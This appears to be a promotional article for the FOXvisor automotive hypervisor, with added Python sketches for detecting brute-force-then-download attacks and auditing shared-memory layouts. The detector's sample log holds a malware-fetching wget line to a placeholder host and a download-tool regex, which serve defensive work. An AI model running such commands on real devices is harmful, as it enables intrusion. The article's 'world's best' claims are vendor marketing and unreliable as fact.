FOXvisor – Virtualization Solution in Secure Automotive Systems

Security in Networked Systems

The networking market is a reality, and it is growing enormously in many applications such as automotive, consumer electronics, and industrial systems. Applications like connected cars, advanced driver information systems, Internet of Things (IoT), Industry 4.0, Deep Learning, Energy, Medical & Health Care, Imaging, and Smart Home are growing rapidly. However, threats are growing just as fast. Risks like hacking, viruses, malware, and reverse engineering jeopardize the benefits of those technologies. Security is therefore an inherent requirement when designing a system. A security violation can have a severe impact on companies, vendors, and users alike. Violations range from information leakage to illegal operation, which in the worst case might result in death through accidents or even murder. The related impact on a company's business ranges from recall handling to compensation for damages, with potential brand image damage and difficulties in company management as a consequence.

Countermeasures are therefore being taken: already in 2015 the worldwide security market was on the order of $76,000,000,000, and it is growing at least as steadily as the number of implementations. The applications are by no means safe, as detailed investigations on many different IoT devices have shown. Thorough research was done by a team of scientists from Yokohama National University, Japan, in cooperation with other international universities. During the 122-day test period, the number of intrusion attempts into simple IoT devices like LED display control systems, fire alarms, routers, security appliances, and TV receivers was on the order of one million. This shows how immense the threat is.

The general flow of network-based attacks is simple. Login attempts are started with dictionary attacks, followed by a series of Telnet commands. When the attempt succeeds, malware is downloaded, actions like information uploads are started, and the user or operator becomes a victim. Just as effective are downloads of viruses and malware from contaminated external devices that are connected to, e.g., automotive or IoT devices.
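The flow described above can be recognized from a device's session events. The following detection sketch is an added example, not part of the original article or the cited study; the log format, event names, threshold and all sample lines are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed session events (timestamp, source, event, detail); not data from the study.
SAMPLE_LOG = """\
2016-03-01T02:10:01 198.51.100.7 LOGIN_FAIL user=root
2016-03-01T02:10:02 198.51.100.7 LOGIN_FAIL user=admin
2016-03-01T02:10:03 198.51.100.7 LOGIN_FAIL user=root
2016-03-01T02:10:04 198.51.100.7 LOGIN_OK user=root
2016-03-01T02:10:06 198.51.100.7 CMD wget http://files.example.invalid/sample.bin
2016-03-01T03:00:00 203.0.113.9 LOGIN_FAIL user=root
2016-03-01T03:00:01 203.0.113.9 LOGIN_FAIL user=root
2016-03-01T03:00:02 203.0.113.9 LOGIN_FAIL user=guest
2016-03-01T04:00:00 192.0.2.20 LOGIN_FAIL user=operator
2016-03-01T04:00:09 192.0.2.20 LOGIN_OK user=operator
2016-03-01T04:00:30 192.0.2.20 CMD wget http://updates.example.invalid/fw.img
2016-03-01T05:00:00 203.0.113.44 LOGIN_FAIL user=root
2016-03-01T05:00:01 203.0.113.44 LOGIN_FAIL user=root
2016-03-01T05:00:02 203.0.113.44 LOGIN_FAIL user=admin
2016-03-01T05:00:03 203.0.113.44 LOGIN_OK user=admin
2016-03-01T05:00:05 203.0.113.44 CMD uname -a
"""

DOWNLOAD = re.compile(r"\b(wget|curl|tftp|ftpget)\b")

def classify_sources(log_text, min_failures=3):
    """Map each source to the furthest stage of the attack flow it reached."""
    st = defaultdict(lambda: {"fails": 0, "in": False, "dl": False})
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 3:
            continue  # skip malformed lines
        src, event = parts[1], parts[2]
        detail = parts[3] if len(parts) > 3 else ""
        s = st[src]
        if event == "LOGIN_FAIL":
            s["fails"] += 1
        elif event == "LOGIN_OK":
            # A success counts as a dictionary hit only after repeated failures.
            s["in"] = s["fails"] >= min_failures
        elif event == "CMD" and s["in"] and DOWNLOAD.search(detail):
            s["dl"] = True
    def stage(s):
        if s["dl"]:
            return "malware-download"
        if s["in"]:
            return "dictionary-login"
        return "dictionary-attempt" if s["fails"] >= min_failures else "benign"
    return {src: stage(s) for src, s in st.items()}
```

The operator who mistypes a password once and then fetches a firmware image stays "benign", because the download is only counted after a login that followed repeated failures.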

Security, however, not only has to be very safe and effective; in most systems for consumer use it must also be almost cost neutral. A prohibitive task, you would think, as most of those systems and applications cannot afford expensive, powerful processors for their protection. As such, other solutions that safeguard systems cost-effectively and securely have to be found.

Which options exist for cost competitive high security? There are two basic ways to implement security: software and hardware based solutions.

Let us take a look at pure software based solutions. A new virus or malware is developed that breaches existing software security. As a result, an anti-virus is developed, followed by a new virus: a never-ending cycle. Additionally, unintentional user admittance is a weak spot. The user virtually opens the door for the virus, which then might be redistributed, and an increasing number of systems get infected. Malware might also intrude through misuse of software update mechanisms or by taking over administrator rights. There are many methods of intrusion into software systems, which leads to the conclusion that there are no secure software based security systems: they are inherently bound to be broken. As a matter of fact, the best path to secure system integrity is a hardware based solution.

CPU IP (Intellectual Property) core providers offer secure environment methodologies for SoC (System on Chip) systems based on these cores. Three major CPU vendors, ARM, MIPS, and Intel, have implemented their own security approaches. ARM (TZ, TrustZone) and MIPS (VZ, Virtualization Zone) use an embedded CPU for their implementations. Intel (VT/VT1, Virtualization Technology) mainly uses servers. A hypervisor or virtual machine monitor (VMM) is computer software, firmware, or hardware that creates and runs virtual machines, creating a Trusted Execution Environment (TEE). Hypervisors or virtual machines that run directly on the host's secure hardware areas, like ARM's TrustZone or MIPS' VZ, to control the hardware and to manage the guest operating system are called bare metal hypervisors. The embedded virtualization modules add a guest mode, which leaves the root or user mode in full control of what the guest operating system is permitted to do. The guest OS remains unchanged and is unaware that it is virtualized. While the secure hardware is part of the IP, the secure OS comes from a trusted third party vendor.

Virtual Machine or Hypervisor

Seltech presents FOXvisor. Seltech is a Tokyo based vendor of security solutions for IoT, automotive, and consumer electronics products that protect systems from cyber-attack. The company offers unique virtualization technology and solutions which combine voice/visual recognition and artificial intelligence for applications. FOXvisor is a bare metal hypervisor, and as such offers the highest possible security and the most efficient use of CPU power, using only 1% of the CPU power. FOXvisor minimizes the risk of unauthorized access by mapping designated secure data on the OS, with no need to modify the source code of the Rich OS. At only 32 KB, FOXvisor is the world’s smallest footprint hypervisor. FOXvisor is recognized by major CPU core IP vendors as the best performing bare metal virtualization system. It supports architectures like ARM, MIPS, Intel, NVIDIA and others, and creates Trusted Execution Environments.

Systems use shared memory to write data to all involved operating systems (OSs), both secure and non-secure. Because the data is therefore easy to see, this implies a potential vulnerability. Even more attention is required when shared memory is provided for OSs like Linux and Android. Systems using these OSs are often composed of an unspecified number of applications, and end users are even authorized to add applications. This means that new applications, which system designers and administrators cannot consider in advance, may access the shared memory. However, where security is more important than execution efficiency, a data copying process can be used in some cases. By placing shared memory in the memory area of the OS that you want to isolate for security reasons, the effects of unauthorized access are minimized. FOXvisor offers this option. Normally, FOXvisor would prepare the shared memory area in an area accessible from all OSs. To avoid this situation, FOXvisor creates a secure, isolated shared memory area in the memory area of the OS. Figure 2 shows an example of creating a shared memory area when using Linux. In this configuration, the other OS or FOXvisor reads and writes the memory area of Linux set to non-secure mode, and access to the shared memory is limited to the OS that communicates with Linux. Even if an unauthorized application tries to access and capture the shared memory, its impact will be limited. Therefore, if security is more important than execution efficiency, the shared memory needs to be configured using this method, which should ideally be fast, add no major overhead to the processor, and have a small footprint.
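The difference between the two placements can be checked mechanically against a partition layout. The following audit model is an added example, not FOXvisor code or its configuration format; the guest names, addresses and the `Window` layout are hypothetical, and the shared buffer passed to `private_bytes_exposed` is assumed to lie inside the owner's RAM.

```python
from dataclasses import dataclass

# Model only: guest names, addresses and this layout format are hypothetical,
# not FOXvisor's configuration format or API.
@dataclass(frozen=True)
class Window:
    guest: str   # OS granted access to this physical range
    start: int
    size: int

def overlap(a_start, a_size, b_start, b_size):
    """Number of bytes shared by two physical ranges."""
    return max(0, min(a_start + a_size, b_start + b_size) - max(a_start, b_start))

def guests_reaching(layout, start, size):
    """Every guest with a window that touches [start, start + size)."""
    return {w.guest for w in layout if overlap(w.start, w.size, start, size) > 0}

def unexpected_readers(layout, shm, allowed):
    """Guests that can reach the shared buffer but are not communication peers."""
    return guests_reaching(layout, *shm) - set(allowed)

def private_bytes_exposed(layout, owner, owner_ram, shm):
    """Bytes of the owner's RAM outside the shared buffer that foreign windows cover."""
    return sum(overlap(w.start, w.size, *owner_ram) - overlap(w.start, w.size, *shm)
               for w in layout if w.guest != owner)

LINUX_RAM = (0x1000_0000, 0x2000_0000)   # (start, size)
PRIVATE = [Window("linux", *LINUX_RAM),
           Window("rtos", 0x3000_0000, 0x0100_0000),
           Window("third_os", 0x3100_0000, 0x0100_0000)]

# Layout A: buffer placed in an area accessible from all OSs.
SHM_GLOBAL = (0x3F00_0000, 0x1_0000)
LAYOUT_GLOBAL = PRIVATE + [Window(g, *SHM_GLOBAL) for g in ("linux", "rtos", "third_os")]

# Layout B: buffer carved out of Linux RAM; only the peer RTOS gets a window onto it.
SHM_IN_LINUX = (0x2FF0_0000, 0x1_0000)
LAYOUT_IN_GUEST = PRIVATE + [Window("rtos", *SHM_IN_LINUX)]

# Layout C: like B, but the peer window is one 4 KB page too large (misconfiguration).
LAYOUT_OVERSIZED = PRIVATE + [Window("rtos", 0x2FF0_0000 - 0x1000, 0x1_0000 + 0x1000)]
```

Layout C shows the failure mode to watch for with the in-guest placement: a peer window that is larger than the buffer exposes the owning OS's private memory to the peer.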

The development of a virtualization machine by a company's own development team is not an easy task, and it is associated with a variety of difficulties. Developing with a hypervisor means that two OSs are running in parallel. For development with a Rich OS, like Linux, software engineers also need expertise in RTOS, while RTOS engineers need expertise in development with a Rich OS. The complexity is enormous. The major challenge, however, is to be sure that the designed hypervisor is working securely. A system’s performance requirements need to be met, whereas the original OS code may not be touched, as the OS vendor will stop any support once the OS gets modified. The virtualization system has to run on each and every new release of the OS software, which means that maintenance for the latest OS versions is not trivial. To avoid technical support issues from the OS vendor, OS vendor lock-in is useful. However, this increases development costs, while support in progress could be slow, due to slow reply and poor communication. The re-usability of past software developments might also be limited. Even after completion of the hypervisor porting, the security software might not be compliant with the existing environment. Firmware and other updates also add complexity to hypervisor development.

FOXvisor was already developed and verified in 2012, and soon ported to automotive and other systems. Business alliances with major CPU, GPU, and DSP manufacturers were contracted. This guarantees achievements by entrusted development for brand manufacturers.

A hypervisor allows the co-existence of Rich OS and RTOS. Time critical and often security or safety critical applications are recognized as such and run with priority over the Rich OS applications.

Automotive Use Cases

Automotive use cases for FOXvisor include instant start-up applications for in-vehicle devices like back cameras, music play, and even the company logo on the infotainment display or on controls and instruments. It operates instant start-up applications that cannot be implemented by snapshot on the Rich OS as if they were Rich OS applications, while leaving them on the existing RTOS. For example, the map and audio applications run on the RTOS during start-up. The underlying process is that the hypervisor blends the RTOS applications with Rich OS applications on the Rich OS, to make them look like Rich OS applications (Figure 3).

While both examples showed the importance of running RTOS applications without being affected by influences from the Rich OS, Figure 5 shows a security aspect in the use of a hypervisor system. Portable navigation systems that are infected by a virus and shipped to the aftermarket, and even software or firmware updates to in-car systems, are a major infection threat through which attacks on a vehicle’s control system could be executed. Virus infection, hacking, or remote control of devices or functions that connect to navigation in the vehicle may result in serious accidents, which is easy to imagine if, for example, driver safety devices such as the brake, steering wheel and meter are compromised. Security can be ensured by introducing a secure domain in which encryption keys, CAN bus controlled updating, and personal information management are handled.

Development with FOXvisor is supported by a comprehensive starter kit: a FOXvisor virtualization machine integrated on an NXP i.MX6 SABRE AI evaluation board, with a Linux NXP BSP or a μITRON eForce μC3 operating system, together with a 1-day training course that includes a hypervisor overview and lectures on software/application development on FOXvisor.

Conclusion

Pure software based solutions to protect networked systems are by no means secure. A highly secure and effective alternative is hardware based systems, like bare-metal Hypervisors. Recognized as the world’s best performance Hypervisor by the major CPU core IP vendors, FOXvisor is the world’s fastest, lightest, quickest to port virtualization system, with multiple use-cases in the automotive environment. It supports real time implementations like start-up applications, real-time and failure critical systems, and protects safety relevant systems from malware attacks. FOXvisor offers a complete design environment, and respective support.

Figure 1: FOXvisor smallest footprint bare metal highly secure hypervisor

Figure 2: Shared memory with TrustZone disabled and enabled

Figure 3: Hypervisor blends RTOS applications with Rich OS applications on Rich OS to make them look like Rich OS applications

Figure 4: Metering application. Safety critical applications run while non-critical applications reboot

Figure 5: Security in Car Navigation Systems

Seltech Corporation Profile

Seltech provides security for IoT devices with its unique virtualization technology and solutions which combine voice/vision recognition and artificial intelligence for applications. The solutions protect automotive and consumer electronics products and IoT devices from cyber-attacks. Seltech was founded in 2009 in Tokyo, Japan. The company is represented in Europe by ViMOS Technologies GmbH, Taufkirchen. Further information is available at www.seltech.co.jp